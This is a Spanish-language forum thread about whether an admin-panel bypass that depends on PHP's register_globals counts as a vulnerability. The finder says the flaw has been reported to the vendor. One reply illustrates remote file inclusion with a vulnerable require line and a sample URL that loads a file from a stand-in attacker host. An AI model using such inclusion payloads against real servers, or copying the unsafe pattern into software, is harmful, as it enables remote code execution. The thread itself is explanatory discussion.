Duda ¿se considera vulnerable?

Iniciado por bizco, 3 Junio 2010, 13:19 PM

0 Miembros y 1 Visitante están viendo este tema.

bizco

Hola, ojeando el codigo de un CMS comercial vi que puedo ver el panel de administracion y supongo que con las pruebas satisfactorias hasta el momento me puedo crear un usuario en el grupo admin y luego logearme tranquilamente (esto de momento no lo he probado, solo el listar usuarios). no necesito ser usuario logeado previamente para lograr ver el panel de administracion, el unico problema es que register_globals necesita estar en on... ¿se puede considerar entonces vulnerable? ya que estando en off, no lo es (o eso creo yo).

Shell Root

Lo haz hecho o no? Solo son hipótesis?
Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.

bizco

si si, claro que esta hecho. ya esta reportado y lo estan arreglando :).

la duda era si al tener que estar register_globals en on se podria considerar vulnrable.

Shell Root

Cuando las register_globals estan activadas en php.ini, puede permitir que un usuario inicialice varias variables no inicializadas anteriormente de manera remota.

Muchas veces esto es utilizado para que un usuario malévolo pueda incluir ficheros no deseados y le permite ejecutar código arbitrario desde una localización remota.

Por ejemplo:
Código (php) [Seleccionar]
require ($page. ?.php?);

Aquí si el parámetro $page no se inicializa y si las register_globals están activados, el servidor será vulnerable a la ejecución remota de código incluyendo cualquier archivo arbitrario en el parámetro $page.

Este sería un ejemplo:
    "www.vulnsite.com/index.php?page=http://www.attacker.com/attack.txt"

Más información: :http://www.desarrolloweb.com/articulos/principales-vulnerabilidades-web.html
Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.

bizco

si, si lo tengo claro. lo que quiero decir es si se considera vulnerable ya que no todos los servidores tienen register_globals en on, simplemente eso :).

Shell Root

Leiste bien?
Cita de: shellroot@alex-laptop:~$ en  3 Junio 2010, 20:27 PMAquí si el parámetro $page no se inicializa y si las register_globals están activados, el servidor será vulnerable a la ejecución remota de código incluyendo cualquier archivo arbitrario en el parámetro $page.
Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.

bizco

me leiste bien tu al principio?

Citarel unico problema es que register_globals necesita estar en on... ¿se puede considerar entonces vulnerable?

en ningun momento pregunte que hace register_globals. sabia que poniendolo en on, podia saltarme el formulario de login, pero no sabia si se considera vulnerable al depender de register_globals.


tragantras

jaja vaya discusión...

yo pienso que como vulnerabilidad se podría considerar... pero dudo mucho que algun servidor comercial tenga el registr_globals a on :/ ya que no es opcion por defecto y no se me ocurre ningun beneficio de ello (aparte de ahorrarse los $_GET y esas cosas xD )
Colaboraciones:
1 2

bizco

por eso mismo tenia mis dudas, pero vamos que hay mas server de los que parecen con esta opcion activada.